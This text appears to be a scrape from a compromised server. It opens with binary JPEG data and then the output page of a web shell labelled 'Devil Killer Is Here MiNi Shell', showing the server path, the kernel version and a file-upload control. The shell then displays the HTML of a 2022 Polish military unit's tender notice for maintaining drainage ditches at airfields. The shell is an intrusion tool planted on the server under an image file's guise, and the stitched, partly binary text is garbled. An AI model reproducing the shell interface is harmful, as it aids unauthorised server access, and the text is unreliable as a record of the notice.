JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20220721/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20220721/0026938101-N-2022.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> KONSERWACJA ROWÓW ODWADNIAJĄCYCH I MELIORACYJNYCH NA TERENACH ADMINISTROWANYCH PRZEZ 31 WOG </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">31 Wojskowy Oddział Gospodarczy</span></h3> <h3 class="mb-0">1.3.) Oddział zamawiającego: <span class="normal">Sekcja Zamówień Publicznych</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 101067256</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Konstantynowska 85</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Zgierz</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">95-100</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">łódzkie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL712 - Łódzki</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">31wog.zp@ron.mil.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">https://31wog.wp.mil.pl/pl/</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka budżetowa</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Obrona</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> KONSERWACJA ROWÓW ODWADNIAJĄCYCH I MELIORACYJNYCH NA TERENACH ADMINISTROWANYCH PRZEZ 31 WOG </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-4cc81ca4-0734-11ed-8000-d680d39e541a</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2022/BZP 00269381</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2022-07-21</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://platformazakupowa.pl/pn/31wog <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://platformazakupowa.pl/pn/31wog</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Postępowanie prowadzone jest w języku polskim elektronicznie za pośrednictwem platformazakupowa.pl pod adresem: https://platformazakupowa.pl/pn/31wog<br/>W celu skrócenia czasu udzielenia odpowiedzi na pytania preferuje się, aby komunikacja między zamawiającym a Wykonawcami, w tym wszelkie oświadczenia, wnioski, zawiadomienia oraz informacje, przekazywane były<br/>za pośrednictwem platformazakupowa.pl i formularza „Wyślij wiadomość<br/>do zamawiającego”.<br/>Zamawiający informuje, że instrukcje korzystania z platformazakupowa.pl dotyczące w szczególności logowania, składania wniosków o wyjaśnienie treści SWZ, składania ofert oraz innych czynności podejmowanych w niniejszym postępowaniu przy użyciu platformazakupowa.pl znajdują się w zakładce „Instrukcje dla Wykonawców&#34; na stronie internetowej pod adresem: https://platformazakupowa.pl/strona/45-instrukcje.<br/>Wszelkie zapisy dotyczące korespondencji elektronicznej znajduje się w SWZ w rozdziale VIII.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zgodnie z art. 13 ust. 1 i 2 rozporządzenia Parlamentu Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych<br/>w związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych) (Dz. Urz. UE L 119 z 04.05.2016, str. 1), dalej „RODO”, informuję, że:<br/>1. administratorem Pani/Pana danych osobowych jest 31. WOJSKOWY ODDZIAŁ GOSPODARCZY, ul. Konstantynowska 85, 95 – 100 ZGIERZ, tel. 261 442 002, 31wog.kancelaria@ron.mil.pl reprezentowany przez KOMENDANTA,<br/><br/>2. u administratora danych osobowych wyznaczony jest Inspektor Ochrony Danych Osobowych, z którym można się skontaktować poprzez email: 31wog.iod@ron.mil.pl. lub telefonicznie nr 261 442 275,<br/><br/>3. dane osobowe przetwarzane będą na podstawie art. 6 ust. 1 lit. c RODO<br/>w celu związanym z postępowaniami o udzielenie zamówienia publicznego,<br/><br/>4. odbiorcami danych osobowych będą osoby lub podmioty, którym udostępniona zostanie dokumentacja postępowania w oparciu o art. 18 oraz art. 74 ustawy Pzp;<br/><br/>5. dane osobowe Wykonawcy będą przechowywane, zgodnie art. 78 ustawy PZP, w zw. z Jednolitym Rzeczowym Wykazem Akt 31.Wojskowego Oddziału Gospodarczego, przez okres 5 lat od dnia zakończenia postępowania o udzielenie zamówienia, a jeżeli czas trwania umowy przekracza 4 lata, okres przechowywania obejmuje cały czas trwania umowy;<br/><br/>6. obowiązek podania przez Wykonawcę danych osobowych dotyczących bezpośrednio Wykonawcy jest wymogiem ustawowym określonym<br/>w przepisach ustawy PZP, związanym z udziałem w postępowaniu<br/>o udzielenie zamówienia publicznego; konsekwencje niepodania określonych danych wynikają z ustawy PZP;<br/>7. w odniesieniu do Pani/Pana danych osobowych decyzje nie będą podejmowane w sposób zautomatyzowany, stosowanie do art. 22 RODO;<br/>8. Wykonawca posiada:<br/>− na podstawie art. 15 RODO, prawo dostępu do danych osobowych dotyczących Wykonawcy;<br/>− na podstawie art. 16 RODO, prawo do sprostowania danych osobowych Wykonawcy *;<br/>− na podstawie art. 18 RODO, prawo żądania od administratora ograniczenia przetwarzania danych osobowych z zastrzeżeniem przypadków, o których mowa w art. 18 ust. 2 RODO **;<br/>− prawo do wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych, gdy Wykonawca uzna, że przetwarzanie danych osobowych dotyczących Wykonawcy narusza przepisy RODO;<br/>9. Wykonawcy nie przysługuje:<br/>− w związku z art. 17 ust. 3 lit. b, d lub e RODO prawo do usunięcia danych osobowych;<br/>− prawo do przenoszenia danych osobowych, o którym mowa w art. 20 RODO;<br/>− na podstawie art. 21 RODO prawo sprzeciwu, wobec przetwarzania danych osobowych, gdyż podstawą prawną przetwarzania danych osobowych Wykonawcy jest art.. 6 ust. 1 lit. c RODO.<br/>_____________________<br/>* Wyjaśnienie: skorzystanie z prawa do sprostowania nie może skutkować zmianą wyniku postępowania<br/>o udzielenie zamówienia publicznego ani zmianą postanowień umowy w zakresie niezgodnym z ustawą Pzp oraz nie może naruszać integralności protokołu oraz jego załączników.<br/>** Wyjaśnienie: prawo do ograniczenia przetwarzania nie ma zastosowania w odniesieniu do przechowywania, w celu zapewnienia korzystania ze środków ochrony prawnej lub w celu ochrony praw innej osoby fizycznej lub prawnej, lub z uwagi na ważne względy interesu publicznego Unii Europejskiej lub państwa członkowskiego.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">74/ZP/22</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.9.) Liczba części: <span class="normal">6</span></h3> <h3 class="mb-0">4.1.10.) Ofertę można składać na wszystkie części</h3> <h3 class="mb-0">4.1.11.) Zamawiający ogranicza liczbę części zamówienia, którą można udzielić jednemu wykonawcy: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="p-2 mt-4 bg-light">Część 1</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem zamówienia jest wykonanie usługi konserwacji rowów odwadniających z terenu lotniska oraz MPS Nowy Glinnik:<br/>1.	Konserwacja rowów odwadniających na terenie kompleksu lotniskowego <br/>w Nowym Glinniku:<br/>- rów nr 1 o długości – 208,10 m<br/>- rów nr 2 o długości – 550,00 m<br/>- rów nr 3 o długości – 529,00 m<br/>2.	Ręczne wykaszanie porostu traw na skarpach i dnach rowów.<br/>3.	Oczyszczenie terenu z pozostałości po wykoszeniu z wywiezieniem.<br/>4.	Odmulenie dna rowów i rozplantowanie wydobytego urobku wzdłuż 1 m wykopu.<br/>5.	Odmulenie ręczne dna rowów przy braku dostępu pojazdów mechanicznych.<br/>6.	Oczyszczenie skarp rowów oraz ścian czołowych przepustów z mchu.<br/>7.	Oczyszczenie i odmulenie przepustów na wyżej wymienionych rowach:<br/>- rów nr 1 – 3 przepusty<br/>- rów nr 3 – 1 przepust<br/>8.	Rów nr 1:<br/>- na wylocie oczyścić kratę stalową i zabezpieczyć antykorozyjnie.<br/>9.	Rów nr 2:<br/>- na wylocie oczyścić i zabezpieczyć antykorozyjnie kratę stalową<br/>- wyczyścić rynny kaskadowe<br/>- wypełnić pęknięcia płyt klejem mrozo- i wodoodpornym<br/>10.	Rów nr 3:<br/>- oczyścić kratę stalową i zabezpieczyć ją antykorozyjnie<br/>- pęknięcia wypełnić klejem mrozo- i wodoodpornym, <br/>11.	Po wykoszeniu i oczyszczeniu z mchu zastosować środek chwastobójczy <br/>na całości rowów.<br/>12.	Konserwacja rowu melioracyjnego na terenie MPS Nowy Glinnik:<br/>- rów o długości 302,00 m<br/>13.	Odmulenie dna rowu i rozplantowanie wydobytego urobku wzdłuż 1 m wykopu<br/>14.	Odmulenie ręczne dna rowu przy braku dostępu pojazdów mechanicznych<br/>15.	Oczyszczenie i odmulenie przepustów – 3 szt.<br/>16.	Po wykoszeniu i oczyszczeniu z mchu zastosować środek chwastobójczy <br/>na całości rowów.<br/><br/>Termin wykonania do dnia 19.09.2022 -15.10.2022r.<br/><br/>Ze względu na specyfikę przedmiotu zamówienia Zamawiający przewiduje możliwość przeprowadzenia wizji lokalnej w miejscu realizacji przedmiotu zamówienia . <br/>Udział w wizji lokalnej jest dla Wykonawców dobrowolny, jednocześnie Zamawiający zaleca wzięcie w niej udziału w celu prawidłowego przygotowania wyceny oferty .<br/>Dokonanie wizji lokalnej w miejscu wykonywania zamówienia odbędzie się dla poszczególnych zadań w następującym terminie; <br/>W dniu 25 lipca 2022 r. (poniedziałek) o godz. 10:00<br/>Teren Lotniska MPS Nowy Glinnik.<br/><br/>Należy stawić się najpóźniej na 5 minut przed przeprowadzeniem wizji. <br/><br/>Wizja lokalna zostanie przeprowadzona przez przedstawiciela Zamawiającego dla wszystkich Wykonawców w terminie i miejscu wykonania zamówienia podanym powyżej . <br/>Wszelkie merytoryczne zapytania, które nasuną się w trakcie jak i po wizji należy kierować do Zamawiającego w formie elektronicznej za pośrednictwem platformy zakupowej na adres: https://platformazakupowa.pl/pn/31wog . <br/>Pytania wraz z odpowiedziami bez wskazywania źródeł zapytań, Zamawiający zamieści na swojej stronie internetowej dla prowadzonego postępowania. <br/>Brak uczestnictwa Wykonawców w przeprowadzonej przez Zamawiającego wizji lokalnej, nie będzie skutkować odrzuceniem oferty na podstawie art. 226 ust. 1 pkt. 18 ustawy Pzp . </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">90000000-7 - Usługi odbioru ścieków, usuwania odpadów, czyszczenia/sprzątania i usługi ekologiczne</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal"> od 2022-09-19 do 2022-10-15</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1.	Przy wyborze najkorzystniejszej oferty Zamawiający będzie kierować się następującymi kryteriami oraz w następujący sposób będzie oceniać oferty:<br/><br/>Rodzaj kryterium	Liczba punktów (waga)<br/>A	Cena	60<br/>B	Okres gwarancji	40<br/><br/>A.	Sposób obliczenia wartości punktowej w kryterium cena – waga 60 pkt<br/>cena brutto oferty z najniższą ceną<br/>Liczba punktów oferty = -------------------------------------------------------- x 60<br/>cena brutto ocenianej oferty<br/><br/>Oferta z najniższą ceną otrzyma maksymalną liczbę punktów – 60. Pozostałe oferty zostaną przeliczone według powyższego wzoru. Wynik będzie traktowany jako wartość punktowa oferty w kryterium cena oferty.<br/>B.	Sposób obliczenia wartości punktowej w kryterium gwarancja:<br/>Liczba punktów zostanie przyznana w zależności od wskazanego przez Wykonawcę <br/>w Formularzu ofertowym okresu gwarancji na wykonanie usługi:<br/>•	40 pkt, jeżeli Wykonawca zaoferuje 6 miesięcy gwarancji,<br/>•	20 pkt, jeżeli Wykonawca zaoferuje 3 miesiące gwarancji,<br/>Punkty zostaną przydzielone na podstawie złożonego przez Wykonawcę oświadczenia o oferowanym czasie gwarancji w Formularzu ofertowym.<br/>Ostatecznie punkty przyznane za kryteria zostaną zsumowane. <br/><br/>2.	Oferta, która otrzyma najwyższą liczbą punktów (suma punktów w podanych kryteriach) zostanie uznana za najkorzystniejszą, a pozostałe oferty będą klasyfikowane zgodnie z liczbą uzyskanych punktów. Realizacja zamówienia zostanie powierzona Wykonawcy, którego oferta uzyska najwyższą liczbę punktów stanowiącą sumę punktów wszystkich kryteriów. <br/><br/>3.	Punktacja przyznawana ofertom będzie liczona z dokładnością do dwóch miejsc po przecinku.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Gwarancja</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 2</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem zamówienia jest wykonanie usługi konserwacji rowów odwadniających z terenu lotniska Leźnica Wielka:<br/>1.	Konserwacja rowów odwadniających na terenie kompleksu lotniskowego <br/>w Leźnicy Wielkiej:<br/><br/>- rów A o długości 2690 m<br/>- rów B o długości 200 m<br/>- rów D o długości 60 m<br/>- rów E o długości 640 m<br/>- rów G o długości 1455 m<br/>- rów przy bocznicy kolejowej o długości 710 m<br/>- Rów przy układalni spadochronów 500m<br/>- rów MPS na odcinku 6,5 km <br/>2.	Ręczne wykaszanie porostu traw na skarpach i dnach rowów.<br/>3.	Oczyszczenie terenu z pozostałości po wykoszeniu z wywiezieniem.<br/>4.	Odmulenie dna rowów i rozplantowanie wydobytego urobku wzdłuż 1 m wykopu.<br/>5.	Odmulenie ręczne dna rowów przy braku dostępu pojazdów mechanicznych.<br/>6.	Oczyszczenie skarp rowów oraz ścian czołowych przepustów z mchu.<br/>7.	Oczyszczenie i odmulenie przepustów na wyżej wymienionych rowach:<br/>- rów A – 7 przepusty<br/>- rów B – 1 przepusty<br/>- rów D – 1 przepusty<br/>- rów E – 3 przepusty<br/>- rów G – 6 przepustów<br/>- rów przy bocznicy kolejowej – 2 przepusty<br/>8.	Rów A:<br/>- wyczyścić zasuwę nożową z rdzy i innych zanieczyszczeń zabezpieczyć antykorozyjnie sztuk 2.<br/>9.	Rów E:<br/>- oczyścić powierzchnię ścian czołowych<br/>10.	Po wykoszeniu i oczyszczeniu z mchu zastosować środek chwastobójczy <br/>na całości rowów a w szczególności na drzewa i krzewy samosiejki.<br/>11.	Wyczyszczenie i konserwacja studzienek rewizyjnych – 35 szt.<br/>- usunięcie naniesionego materiału zanieczyszczającego w postaci piasku, namułu, błota, szlamu, gałęzi, śmieci itp. Utrudniającego prawidłowe funkcjonowanie urządzenia,<br/>- konserwacja kratek ściekowych polegająca na usunięciu rdzy i pokrycie powłoką antykorozyjną,<br/>- oczyścić elementy betonowe<br/>- wyczyścić osadnik studni<br/>12.	Konserwacja rowu melioracyjnego R-G2 na odcinku 400 m od wylotu ścieków do ujścia rowu melioracyjnego R-G<br/>13.	Ręczne wykaszanie porostu traw na skarpach i dnach rowów.<br/>14.	Oczyszczenie terenu z pozostałości po wykoszeniu z wywiezieniem.<br/>15.	Odmulenie dna rowów i rozplantowanie wydobytego urobku wzdłuż 1 m wykopu.<br/>16.	Odmulenie ręczne dna rowów przy braku dostępu pojazdów mechanicznych.<br/>17.	Oczyszczenie skarp rowów z mchu.<br/>18.	Oczyszczenie i konserwacja zbiornika retencyjnego znajdującego się przy bramie Krzepocin.<br/>19.	Po wykoszeniu i oczyszczeniu z mchu zastosować środek chwastobójczy na całości rowów a w szczególności na drzewa i krzewy samosiejki.<br/><br/><br/>Termin wykonania do dnia 19.09.2022 – 15.10.2022r.<br/><br/>Ze względu na specyfikę przedmiotu zamówienia Zamawiający przewiduje możliwość przeprowadzenia wizji lokalnej w miejscu realizacji przedmiotu zamówienia . <br/>Udział w wizji lokalnej jest dla Wykonawców dobrowolny, jednocześnie Zamawiający zaleca wzięcie w niej udziału w celu prawidłowego przygotowania wyceny oferty .<br/>Dokonanie wizji lokalnej w miejscu wykonywania zamówienia odbędzie się dla poszczególnych zadań w następującym terminie; <br/>W dniu 26 lipca 2022 r. (wtorek) o godz. 9:00<br/>Teren Lotniska Leźnica Wielka.<br/><br/>Należy stawić się najpóźniej na 5 minut przed przeprowadzeniem wizji. <br/><br/>Wizja lokalna zostanie przeprowadzona przez przedstawiciela Zamawiającego dla wszystkich Wykonawców w terminie i miejscu wykonania zamówienia podanym powyżej . <br/>Wszelkie merytoryczne zapytania, które nasuną się w trakcie jak i po wizji należy kierować do Zamawiającego w formie elektronicznej za pośrednictwem platformy zakupowej na adres: https://platformazakupowa.pl/pn/31wog . <br/>Pytania wraz z odpowiedziami bez wskazywania źródeł zapytań, Zamawiający zamieści na swojej stronie internetowej dla prowadzonego postępowania. <br/>Brak uczestnictwa Wykonawców w przeprowadzonej przez Zamawiającego wizji lokalnej, nie będzie skutkować odrzuceniem oferty na podstawie art. 226 ust. 1 pkt. 18 ustawy Pzp . </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">90000000-7 - Usługi odbioru ścieków, usuwania odpadów, czyszczenia/sprzątania i usługi ekologiczne</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal"> od 2022-09-19 do 2022-10-15</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1.	Przy wyborze najkorzystniejszej oferty Zamawiający będzie kierować się następującymi kryteriami oraz w następujący sposób będzie oceniać oferty:<br/><br/>Rodzaj kryterium	Liczba punktów (waga)<br/>A	Cena	60<br/>B	Okres gwarancji	40<br/><br/>A.	Sposób obliczenia wartości punktowej w kryterium cena – waga 60 pkt<br/>cena brutto oferty z najniższą ceną<br/>Liczba punktów oferty = -------------------------------------------------------- x 60<br/>cena brutto ocenianej oferty<br/><br/>Oferta z najniższą ceną otrzyma maksymalną liczbę punktów – 60. Pozostałe oferty zostaną przeliczone według powyższego wzoru. Wynik będzie traktowany jako wartość punktowa oferty w kryterium cena oferty.<br/>B.	Sposób obliczenia wartości punktowej w kryterium gwarancja:<br/>Liczba punktów zostanie przyznana w zależności od wskazanego przez Wykonawcę <br/>w Formularzu ofertowym okresu gwarancji na wykonanie usługi:<br/>•	40 pkt, jeżeli Wykonawca zaoferuje 6 miesięcy gwarancji,<br/>•	20 pkt, jeżeli 